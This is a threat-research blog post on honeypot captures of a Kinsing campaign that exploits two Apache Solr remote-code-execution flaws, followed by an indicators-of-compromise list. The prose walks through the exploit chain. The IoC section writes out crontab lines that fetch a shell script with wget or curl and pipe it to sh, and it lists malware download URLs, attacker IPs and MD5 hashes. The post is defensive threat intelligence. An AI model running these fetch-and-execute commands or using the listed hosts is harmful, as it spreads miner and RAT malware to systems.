Akamai Diversity

Akamai Security Intelligence
& Threat Research

Tales From The Pot: Solr powered Kinsing

Additional research and support provided by Chad Seaman.

Introduction

Akamai SIRT has been working on the development, and deployment, of custom multipurpose honeypots that attempt to mimic a wide array of services and devices. One of these honeypots shows the inner workings of an active exploitation campaign targeting Apache Solr (Solr).  The campaign had  a noticeable effect on targeting and exploitation attempts for two CVEs impacting Solr servers.  This post will explore what these exploits target, how they work, and observations about this ongoing campaign.

What is Solr?

According to Apache, Solr is a "blazing-fast" open source enterprise search platform, which is built on Apache Lucene. It's scalable, fault tolerant, and offers distributed indexing, replication, and load-balancing. Many of the world's largest websites use it, including retailers, platform services, news organizations, and broadcasters.

Solr CVEs targeted

Akamai SIRT has observed several attempts at exploitation of Solr over the past several months.  The most active campaign leverages two different CVEs issued for the project in 2019, impacting versions of the software released as recently as late 2019.

 

The first is CVE-2019-0193. It allows attackers to achieve remote code execution (RCE) on a server. This particular exploit impacts targets running Solr up to version 8.2.0 (released July, 2019). The second is CVE-2019-17558. This vulnerability allows a crafted request to modify system configuration settings, enabling a scenario where an attacker can trigger RCE . This particular CVE affects targets running Solr versions 5.0.0 to 8.3.1 (released December, 2019). This combination is quite effective, since by using both CVEs, an attacker is able to cover a wider range of vulnerable versions and configurations of Solr.

Honeypot observations

In February of 2020, these CVE combinations were observed hitting our honeypot once every couple of days on average. Since September of 2020, we've seen a significant uptick in activity with exploitation attempts occurring regularly. In some cases, these attempts are happening multiple times per hour.

With Proof-of-Concept code for both of these CVEs being publicly available, it is fairly trivial to leverage them together in order to maximize the chances of successful exploitation. Some organizations are still using older vulnerable versions of Solr, leaving low hanging fruit for attackers. 

For both exploits to work, the attacker first needs to find out the Solr's cores' names. This requires some probing by the attackers, eventually leading up to actual RCE attempts. This means the exploitation attempts we've observed on our honeypot are always preceded with a simple GET request to /solr/admin/cores?wt=json, on port TCP/8983 or TCP/80. This request is expected to respond back with the names of the Solr cores in JSON format.

 

Fig. 1 Probing request for cores' names 

When the request is made, our honeypot responds with a fake (but valid) payload, mimicking a real response. This is enough to trick the attacker's bot into proceeding to the next stage of the exploit.

CVE-2019-17558 usage

Immediately after the honeypot replies, it starts receiving a chain of incoming POST requests from the attacker. These POST requests contain the fake core name provided in the previous response. This chain of requests attempts to leverage both CVEs, one after the other, and are shown in sequential order in the images below.

The first few requests are utilizing CVE-2019-17558 vulnerability, which affects versions of Apache Solr 5.0.0 to 8.3.1. These versions are vulnerable to Remote Code Execution through the VelocityResponseWriter.

 

Fig. 2 Request enabling VelocityResponseWriter 

This request toggles the Velocity Response Writer to true, enabling an attacker to use the Velocity Template parameter, which will make Remote Code Execution possible.

Following the configuration change request, we see our first use of the newly enabled RCE.  The attacker attempts to delete the file located at /tmp/zzz . This is done in order to delete older versions of the malware from previous successful infections, and serves as a kind of  update mechanism to the latest version of the malware.

 

Fig. 3 Removing old malware during fresh infection attempt using VelocityResponseWriter

The request that follows is another RCE, using curl to download the shell script 5.34.183.14/s.sh, saving it to disk as /tmp/zzz.

 

Fig. 4) Download the first phase of infection (s.sh)

The next request makes this newly created /tmp/zzz shell script executable, and sets the stage for phase 2 of the exploitation/infection process.

 

Fig. 5) Make the copy of /tmp/zzz (s.sh) stored on disk executable

Now with all the pieces in place for phase 1, we see the attempt to execute the shell script /tmp/zzz. 

Fig. 6) Execute /tmp/zzz (s.sh) shell script

CVE-2019-0193 usage

The exploit chain leveraging CVE-2019-0193 uses the DataImportHandler to achieve RCE. While it requires slightly different tactics and payloads, the goal remains the same; fetch phase 1 of the infection, and get execution. 

 

We can see another attempt to delete the /tmp/zzz, but this time using the DataImportHandler and the accompanying exploitation payload.

Fig. 7) Removing old malware during fresh infection attempt using DataImportHandler

In the request that follows we can see an attempt to download the same malicious shell script using curl.

 

Fig. 8) Download the first phase of infection (s.sh)

 

The next request, once again, attempts to make the /tmp/zzz shell script executable.

Fig. 9) Make /tmp/zzz (s.sh) shell script executable

Malware

Kinsing is the family of malware the actors here are ultimately attempting to spread. Others have done a great job in covering the features and functionality of this family of malware. If you're interested in knowing more about the Kinsing malware family and its inner workings, the folks over at Red Canary did a wonderful write-up on this particular strain.

What to do

To mitigate these threats, the SIRT team suggests upgrading to the latest available version of Solr across your organization. Following general best practices means making sure to patch your systems regularly. 

Due to the malware authors regularly pushing out modified versions of their binary and script payloads, relying on hashes from IoC lists isn't a sure-fire method for detection.  In our collection efforts, which ran for several months, we identified a dozen different shell script variants, and 375 binary variants.  These variants don't appear functionally all that different, but it does appear the actors churn and randomly modify the data within the binaries to trip up fingerprinting and hash based detection.

In this instance the attackers are uploading a cryptominer, worm, and RAT. This means monitoring your systems for abnormally high resource consumption and suspicious network activity, could help identify machines that have already been compromised.  They also establish persistence via crontab, target Docker images, and have additional scanning functionality via masscan.  All of these components can be detected, and SIRT suggests reviewing a suspected system for these various traits as well.

Closing

The deployment of custom honeypots that cannot be easily fingerprinted can provide tremendous value from an intelligence gathering standpoint. In this case, our honeypot was able to show a substantial increase in exploitation attempts targeting Solr instances, and provided interesting insight into these trends and what they were currently being leveraged for. 

Our custom honeypot wasn't just able to show a dramatic increase in popularity of  CVE-2019-17558 and CVE-2019-0193.  It also showed us an evolution in this campaign, as there are no previous public ties between Kinsing campaigns and CVE-2019-17558 as of this writing.

These findings are always interesting for the SIRT team from a research standpoint, but organizations should consider honeypots and canary systems to better understand threats targeting their organizations, especially if those systems emulate/simulate real infrastructure they're tasked with protecting.

 

Indications Of Compromise (IoC) 

Filesystem:

/tmp/zzz (hashes below)

kinsing (hashes below)

firewire (45a7ef83238f5244738bb5e7e3dd6299)

 

Crontab:

* * * * * wget -q -O - http://[SERVER]/s.sh | sh > /dev/null 2>&1

* * * * * curl http://[SERVER]/s.sh | sh > /dev/null 2>&1

 

Infrastructure:

http[:]//45.10.88.124/s.sh

http[:]//5.34.183.14/s.sh

http[:]//195.3.146.118/s.sh

http[:]//45.10.88.124/kinsing

http[:]//5.34.183.14/kinsing

http[:]//144.217.117.146/kinsing

http[:]//195.123.228.32/kinsing

http[:]//195.123.246.63/kinsing

http[:]//212.47.251.177/kinsing

http[:]//217.12.223.51/kinsing

http[:]//45.67.230.68/kinsing

http[:]//51.83.171.41/kinsing

http[:]//93.189.43.3/kinsing

https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing

https[:]//bitbucket.org/sam3cr12/git/raw/master/kinsing

 

Scanning/infecting systems

95.214.11.231

95.215.108.217

212.8.247.179

 

Targeting:

Malware MD5 Hashes:

s.sh (/tmp/zzz):

b7ddbfe40c2745c2d40f012429657569

2e93c435bbb7d8b4c2e2abfd9c72bc57

eee9c2e8e928698c60845fba92539c40

f5624b4d148ca262b96ac8e7589a8ea0

389625d41464144b457b89389f91237d

e040303652c05dbf6469c9c3ce68031a

9d5e4ece7d06e8b0341bea09495ca8bc

755557b80ad7dcd270c4700fd09b64f6

1914f442e81700c0fdf1323e3776bd8f

9afd84aa9bf2eee2a8e6dc6725ff01a9

a0bed31f959316dee7069fb4d40215c9

7050d548c80f086ab9d968702e5491de

 

kinsing binary:

52ca5bc47c84a748d2b349871331d36a

a71ad3167f9402d8c5388910862b16ae

5df9653f879d9fe125a826fc8a8961fc

8f9da7eee442f769512b0c402744cec5

5140ea744699adcbf430c72aece22631

2cf73cb3414e3ac664e70862aadef8ac

1fdcd8e67e57d9ede9d97b7a9b6ae170

e2f6bc37f61a046a481533a72be8167a

0199eeb1b23ddb0c4f498c70855e5eef

2ef3c8d1396731ccfeeb79649f4e9875

cf32c6a86859b5bac70eb05df3fd0733

934ef4659a1b1faa50a5a628c4957f7e

589c3416e7864f023684aae89e53e039

2b249b99aa6109c737c445853cef6385

6dc2f77ed3030cf941dd39b188a9dabd

6120d3a66e9d2d83bee5d62d29611772

967ff1462e2fca5bbdeed88018de141b

85d4f876b616ded08ca98a784dfdc2b3

ab1d1c2ef830c65be886cdb9faa39281

2901d5bf6643f6f121f3ebd2e5cada91

dd65ecb3a6d18704fef056f35568c904

a167e8cc226b8c21de64d6a4c50ce5ec

de96b604aba2ad1148c0cb7cd4c7ef94

cd907c5bd782c15d8b2f29d1216a72ea

625b5524d311c8b7be2043280849a303

f67c8b3a5cc746bd3ea40b499021b515

afdba8c535dc3b5456c4ff6db9e3ccb6

f741eae2fc62cb16385dde5df2212c1c

319e38446a1487ef4238090ee3376f7b

a0a1d883359628628f01ac62a6d81665

b14b5e59ba58df821c10218b7ea34b58

8578e7f0ca18d6dbfbc2561d91bea9b2

aa1d5d101c773e1a1e4547bd73d265b5

68021e20e4f73bded14bfcc3d0a6496d

2da46123772b81d604363a589f495433

6d851e6a5444e52feb651ae4f026d4a3

bfd32ddd4cb192c44f0f0110df228f40

31872934f0be8d679428638ec718bbd2

9dc4e0f90c1f57c694715850ec2d1f00

e0b3c691c98bb904e0615ed166815412

ab63062f6bb36a3a75c0b35bab40a69d

e57df5f74349f517f6cac3e660c156f8

b4edac4c2e75c5fc9cd4d5472a090e4f

d3eb1c1ed0af67b0f440158bf1837876

2949caf9ae273e654ba48e9551091647

d6d17b031f1a4173c915224abe2769f4

7e2680143c9c6172773eb868d9b07f15

89e90bc8b1f31bcd42388edd9b806465

2b96def4f086e0625ffab57f10f5e7c7

1de381406f38d811bd6c2cf07ae415e3

f07b380239f658aa0fa51f45495a8e08

290425e42d1e62c80e8bd0d850dbc2d5

5308576bd7e208fe90019b802f9bbfd0

143c10d15c4e0651c01ca0ab064cf5fd

346803090b07eb8e5a2fb03c8e4bc5be

aeb286ce32226da41c3bce5d68e30878

98934a4e9f72d1bf4cf2983a681b16ff

4a002e1d4ec4b77a76463f112aa0c77b

9224e58f140ea215bbb141812557168b

eec9a585385e71a0e24b108428a80317

d3dbf65a3559c27a2160a28125041927

12180a996bb1775a29f0efb2445a6a63

a7daa58995edef43d078372b59a0a5bd

203b3ce8cdbc7da9ad7748fbe6128798

3bb59ec47d8642038db90a0ff62d8ad4

759d944a4bc7e86b46a9536bce0af5e0

54f3995dd10c4db102c03ddd94789620

9e866fb6cc9f640cca08017bae0babc4

41e2601f2af105affb24a3dd67fd9098

314d8c536fa32620822e91cecafd8e6a

98a3739437e37a0e1da1252ced0f3ea7

42ddfacbdc9d78b8aec1b03211c18f18

1a6f4ad94a6f08523362ed346039c792

36206fb2b3b348ef82d09614a4d242df

a043a388e7608ef981fbb651d076844f

61841b6b65d22342c91646ca9b299c82

1ca05e87368cd8c98583c646dd624df3

23540dcc39b1eaea2b0be2627f4ead40

2ae4eaa9655e8f0aa86ac7930a809c2a

c81d94c82eeabf827497e74c5f338229

d1c3b7cf6b142627495310f271bff272

35b086de9374e4ee34c566a8f7a2ac8a

60d9fbf0c1f42863cddace7d526104f1

0f3dd5fc25b172770029a88a132e48b1

0468370815adae0bdd630339115c8e56

03dc8db8865315c9093ff31bf05f2024

7fc09c806eedaf411d4f996c70360fb8

3fa7916f7050dadd0b6a827976ca533b

191d3b15c471a58654911568d6e2c380

7868343d8707285f68f43054d3af2d78

d2dfd874b7f97b6d9d521ca3d1c51ddd

8b6b887125788acbdddd2edb565b1fb6

20d6ab36078325156cf8d1dfb395ce55

16c616bd2328273e1d138380b1e49cb4

b2855b8ecbb6fee69aa24146b330aaca

c92d34162961de065ceb4eb5fc3761da

0c4e1e4fc357b7e60b0517831595f27d

ea30ef5f9d7bb8e0dd3038503e6e3632

d31663d8dedc354caf921dd298b4bc2d

71a83fa578da14e66a63cda0183ec42e

71fc804d4568497a0d175ccce50efe32

ce2221c6e58717f253a647f927ed43d5

0576e60b617c01b304edbe360c43d933

a21316cf7d91d08bb511ab5af0f69826

9c5ec6db02d063c1f092dcc1b4ce8141

f3e07bda22cd3872afc540815b3a0f53

863a232c220c89cb85faad9e351aa45c

b3bc9d8dcb9abde9c890c31eeb1ce3fa

d765ae0520f8357b01889e22d1e72390

fcb59544d83837ded2ccf03ccb67badd

720b733ae2978848f0b8ad7f5841ada1

64f6fc7055a86689c79114b126eca6db

fa7642258cfa5c04ef81d3af3957929b

e2a1c8162468054359cb88c808b314a3

4a6796c191eb2b00836a5887b39b259e

0bdbba39b1af49097a7e0627fd535054

ddc73a899625a112d4eeaf74fbc8c91d

27c62c6ee27c6db9a397418742a1c41d

a954c90a06fc128e07f79edc6a9b9784

a5d6ee9a3d7b68333531080172c7ee4a

58c9a48c1a5f4283c3bbf07cce261b24

b0132505fd57f9cf404d5dc1ebf38af8

72bcbdc0804bcfb67dc6c08316e8f76c

0c862a603bb8ec7ac33c850a81829718

363fd23028fc9f7cc2f352416a3e9fed

2b1d3ad198a5732a9b35069538c96c74

4f2d12a37b3a0953bd879667a1badae4

d0b2a2bd1e1c697799140c86f7caaedf

05149b64f421e21493af01e9da997519

4505e8e2b12fbf7fa45bb8f87918c774

dcc901ec6615c66de947ba725e27a634

241ce4fb4e51d138360f43157588f0ce

9f7d349d75a8865ad76001e9dfe69ccf

9255ce9f43d3613a3a9653c124a67cdb

860b2bd24fe860c294e752fe4f08dba7

abfdbbfdc9ac9b4df25b8ce8549a927a

2a4620a3bf67b1f13af30511cc98376e

af3cde952cd5e4027844e52f30439730

d8e64f8c4cb4ea365ff4306b73030ef1

b5f8f7ec562db341743d47e4caf7be29

0b5337b5539c594eac8b4d3f9bf5dab3

88c6adbc5e02ab225cad45d3de5a8149

1c114d426f601308395b316cb4fc7a16

702a02621715334a2f223cfc8ea0874f

72c55c4a2c5611beddbbddbc56dcab85

42112df13e1c909fcb92c7014d0b039c

9d61cac67553d14c5af1727452776ed0

27f322d31b07bb666c9387791bce055c

e8a2819a1270234dfad1188ac80550d9

b30c0b1ac2f8fd16c61e58a3533ec47b

6932286348f7a4f627f33563e2f27551

da40806f094846388ac5b35ea10426ac

45d970a44699707a771c9d2af9c14835

149fdba5ca1ca39ba34600f157e6de86

a62447ba3c95958e64673991d094d91f

e55795d8c87439be95e5d3b3e8478fad

be71c59d1a0a46365c2287a12361a76a

7b795cde0251430c129755883cf1ac0a

0ebbd581200f30255cf7bb46dcb8662c

99b25960605149b2caca2f885c8c84e0

934254ce2dde9c9766f78df03ac0b4dc

6c8606b07a0c54096768e46d5935c93f

29b818c71ffe30f9887b202096851620

8ad57f847fa5783a7ae241c38cee1441

32fa535f5b6f4213a6090a1b0f9309b3

b167f3ae3450c9c7612994d7e1e8d4d4

e43c657ea373ab76d0b9ce91aab992f6

8bf6f5e8b09576c87ede612ea6b4e218

34770d610d5fbd007096f5fe9f5061e0

ba94bc65b013ec1114edd4c59b9f8047

2653c5cac626885369291de9d6f01b9b

5dc8484e6f9191ec97e42b2feda3df8f

ab248c1966fee3316ddb4773142b9b29

de322ce88a48558206d138afb012cab1

7aefc5c84ffc50f7f5b4f053fee1f0b7

fd1b3e2bda8b15107362c41ff39fdabb

24592d3d41acf36d4d279367b3a6e11f

f4adf5fb8818bedcaeff62facd971a8c

eeee79c00608977607176b7cd5ce2e0a

6e1bba0359e2f2098c444394d6f9a385

e7ebe08ae45b3cde5a6a941f7ff8f432

688cd2379b8908c82d905ee05191a9c9

3d2b0ab5c85feb19838bf75f5c6c0910

595f951a5d55653a356f13148dd657fa

c396d73060f0ff287f09ab2ecff32417

813ceac1b9a62d43069594ddcfce02ee

8f3aef0ca2214a0fcf66b8e4a556ae8c

ed9da8201fecc47a66001aefa9fc119e

9ae303979fad718e668e2c28895e1ec0

715b4898126ca0bd0d4e59ddcb63cfc4

ba621c1a0614baf22b6d6221e6cf1898

6b0d416997f7a2e33011be555992cc6d

bff5fbe7ebb8d9654b7959b68c6cd858

47e0ed20f8bdfbf1c9e484440edf9fad

3e621f4c5b60e9bb3be1b1873b5f80da

02601ac2cab92855839145c2bcb9d48d

4e2bd8fcfa5092af2028b4e96772219a

0f2a1edef8cb8dcd120d54f2d1d492f1

3f167bf5aa66bf2a0351f52084060b58

53b657fd3cc94a96fa991e34d7b29dc6

f27293496730ab30c15e7b653e0314fb

01ec9541288207df0e3c6d1e959a4d3e

4dbb7a876c9fb56f271c5725b39aa1d6

7556aca7f24364dc49a74d3af374425e

4f107de664f7ecd7b8519dc6f9c3f897

39404c988ac1b28740c4c843fbb90cd1

d2101f1c25bed07f87763e72cefd262c

5b49f847c5e2d7847bff726af2a015b6

90fb286a3ce23d357b6909d3d3e0a590

d0df2e9681db2c48beb663b33b47d6c3

d2879024a46ca57049ca069d1642f0a1

303e921ef07a29c9730486649dfd410d

d2a8345e53afa3b5bd9cf21e991e8525

96bcb0f2ad3c15559d444714af8ef562

611472eac05fb34e55d93ff13817d1b1

b04b6167bce5559f4b666e0b4fa3384f

b1897675cc504e4f4fcc72b0b1c4deed

0468e5146f7e3122ae346340f35030ee

4bc4e0a2495e76d33e8dc2e370c5e60c

10e04f5a8b525ea5ee8d531b8e6af2ed

ad9c639001f2c7fb1239c9b1d4aec2bf

547ffbfc6d4c5f05d27daa9bf6669d62

1cfd186bbc9a2d36563a13d31410e446

c746c272ace32f5f81e735aad83df64b

0566ae34220e959e7ac2f00f8862c04b

b8c54dd2a4cf4902ed0b26c694b7e14e

c4ae5f58ff9bf3d76d290e0d13d4a495

83e0103841236320129c09bedca71675

dd5a69d6a418aa13e19d0a383e6aa457

6aa59c6d781a9ee4298530f77fd54dbc

e3f3c04ae9bfc3a180aa3005419bd598

b9a827b75381cf36fc367e51f10f9b28

4691f9106c5958671d0c46efb31398f0

55721a627a04630ebb1f8648e7e084e6

945424aad23bd231ef83de1868b1d8ca

0269999b853b35513b176d54b181af87

69617964fa5a0bf9d2a7716bb3482c92

90c60172be7e834dd2d944f46918a593

9ffe88c3e3b20d961cf5ad38a35c9755

4506a6da429c1f851713a7c1d3fe8c75

27bbf856bd80bf97f7c2400560025ba1

356df04bc3d20c0d1827011d04f33368

e188785c823a15eb1417549dff9795fe

c1afc35ca8625976a2eb3fb4a50284c0

046d2abd03c0e6844787bfd422fcbbf9

0fbb8a7ea2d77ec74f0d59780b4f1a97

d662f2e3bdcc0b23514a64e4d8a2dbf3

56d11edfe5b19c492e0d394e5867f419

87e1db5575810fe4a04bac9056c5076d

0681689611fcbc84c2350f75bb0a6e01

f803d991f72c1b03bc783327c8d8e43d

ac5abfd302eb2fbac5969145b50a87d6

815e2ea30afe994fde2ff39abf82e69d

f0f1c67e517b5a4b4e80cf341bdbbc46

add890c155bffdf61313fec6fd3ba17a

f0f1c00339853d3fe37a3cb5eee08877

f4d90c6eb1f6f0fafae33f567f5e305e

bd054651cdbb39f4674c7d65a73151c2

2810ad01176de84e1466e85b9a368b87

5c7a310d2097f85b0b04e00a26ddbdca

fad157f75852d51c0193042e923c7a76

42edfe9b32d2d6b264a1e0b34b6e7035

4581c14e50165c40745de8d59ab60e08

752bca87defb0969d3af9787ed37096a

ae901cce1c3f361cb36497e3507a5017

cd5e764d9d8a5cfd50f9dfc9d7d54bb4

69db3390c28a6a142d0ea5fe9e83708d

773003790c55ec362ca1b63b476a3b56

50dc6ce900df4dfab333bcae8c191056

15f045eecdc1083fa08c9c160bcba0d4

7bde3a5be3386068b01915f1fca513c6

fbdf66a4e52fa22a850f8b131d37160f

086483ba281bf599d3d60758812e73c0

8f24ab3980a18b74e9d1d34b56e9b3db

11ed123169e1e7a83ec15340b882a3c9

05474969465d2e21c4db11e44726614d

296e5b6ee8115646ff31d24d0729a4e4

645053ed19c30749c03c8e42d14f831e

d3249b419688fc1b58567c74a06844cb

868191bc16ccf5f5990a37325ec43e0a

9e2bbe05cb38229c73ed65d9ffa38058

30ece635ececa6450992636f1654f535

d36c20f83eab31581416b16680f413f7

908f384bee8393a040e0bfec7737b794

0e7e9cfe2b646aecb156650adc76b718

f1eb638121ec4ca2a8f30f0f22843d58

c86cf5d3539a91884dee9fd7480bdaef

223bcc51e5d18a973be606dbdf0d51a0

bffecf5a53c6cabe049949e10f2bcb4c

18048610f0a3ef3fb3f3a38db0280390

2ccda35c6503666f76d85f08574c2c05

04d83068de9a9900c9f0b79466d196a8

6c482412869bd3e3b7bba2157a7abd5a

73e97ed9b581729b4836b93c1ed6e23b

d1b70d282c43be2094b210c2263ece89

7fd5a77330470b99ccfcb92cef25d389

a187092b8f1bfc4a3fd42281d0b41979

9bfac63e4f37f20d0bee7c8a62ae4754

0c3cdc4ef67a1833c05872bffa5ec25f

1098bba268fa0f0d8791d168fed8798f

a04d4ddedac7faaf5296ab920604baa2

ea0562e26dd08e426584d2ff91adce9a

acaf48a7166629914314d3650d8708fc

a8308fe9c0f23d628fba3ee6a077f883

52ca5bc47c84a748d2b349871331d36a

350c0a71f7e712ff86d5325f0f439264

7d45cc661311e338bb1d4d1386cc8725

73caf3cd331bcb6e794ce9c4083c74a1

4b269be6b01ba217446127932e15e1c6

921f14fb3d67e09d36611787e7eb0dcb

7ae35f68986a092825755c002ad9f178

825701e00f7ca39d9aab5caddc4fe414

340d4f5ecdaba139f4435c874b4d4e96

fc2d99b24162bab4d39e9133e8df12c4

a71ad3167f9402d8c5388910862b16ae

f2d5c60fe58e66c88ce8ee3dc5587351

6156e2fb93cfdc5c660e5a0a75da427f

45a522991f0c178237823b1cc9c90ac9

894a3988b467c53b16f9916e9c5889d9

bc244f588125a2721a5cd009c2277fa8

596cf0041bd75e6cf23e764a9ed3137c

471829eda5f555aa237e5946a7e344a9

ac283c5f20a772998aefd8674c00444e

6cda7b8c26b016049cbc02fe0b9809d7

89c2a62f65be471e0d021912ca7fc64a

2ac078bd3f04b2657cb95617621c9b7a

7b5934503795ba153ba094423def0355

11416be64ad039970dcf8497c3693710

80a270c2ccb58a4a5be8a8ae1f9ffda9

df39db87ba0a5313100d7079fd722a8c

81255ebe4cbba52522fb2eddbcf46641

934f1489307ab407c95442a13957fdfd

34391d637bcd3828a5a40df05f6e6c17

57c00cd161ec11ee878788528a6bd2e3

487ba0efa35e9bd0feae56da215cd6d4

fe4fc001ca11dc10a149474cd074df64

040e566e8aefc3bf85713a63c624ab26

09f3e82b833a5c0a0f7e293a0798752c

386f40fffcb113751ebadfc714d5de9b

eafd93e35f1963e644643ff174e7dcab

6e8ed689e1007fcc4b9312f7f0708b7b

342fe5956a98bf75a8aac6fa5b82ec12

15d6c4b0fbb54d8fd1045e721c669fb4

ed5d6d1865a96f06e969cba6eebcc89f

3bb5dcf3da401aa63f776dac393963f2

29fc16e7f2da6eb3683b032cd04f8c08

2f6e534adf76937651ea7ba06a051aa0

d9a97c7a4b71cb0cd2d8a7f7702a4a86

1915016976837d2780cb110cd4d6d325

87ab26382da34514ca521a79114ed425

022adbb8b63a1c7b274aab0e4bbc95b4

397e4354139a1afe0792783ce67c7b33

81193605e11fce6cb4232ca4c4bdc6d9

77cd370d2fb27891e026dc8cf320912f

322f06baaeda15aa842034fb3bca5881

31bb95b8d65910bdfdeca729e63d59aa

4a8e23bd11c7f53a02b2e80cca3b1af4

da8d4fff9d33ed35117bde7a6829c4fb

7605a17ae6e0f107ea66a5d879927a9f

a6eb477258caf9098ba6b4eea030fb2c

0d2fffdfa9b8c4f0f90df895e5b1f1c4

1554ce36caedd74becd22b28a551cc78

a04d912ba4c47c7434a765d2f8062006

a2f8eafb60e79df3b3f98499fd9265a7

e1fc266c0b76cbfc6189572b0a9ff727

9d242fe4ba0a6277249a233b5f3e320d

56241b6b079b2df243df6b5eba6e6fb3

b5d7f561469d7ce30080932a91638db5

4522414b66f83350a07c6b39f1213442

d0330b2eb972e89e3e19b7508f1bb99b

e804f4a0fea7c260f605abe0170ae729

38dda6752ebd529375f5ff1ac1f8f805

9a3de11f7653d46e2694ae56a7c92692

ea9af06ca6881e11e4af7c7f48a3cf92

bcf27acdb30521775faaf09df30b4883

0187065a658bcbe02d09799b95ac0298

1bf724f45d60db5b1e2a83c08b27a98a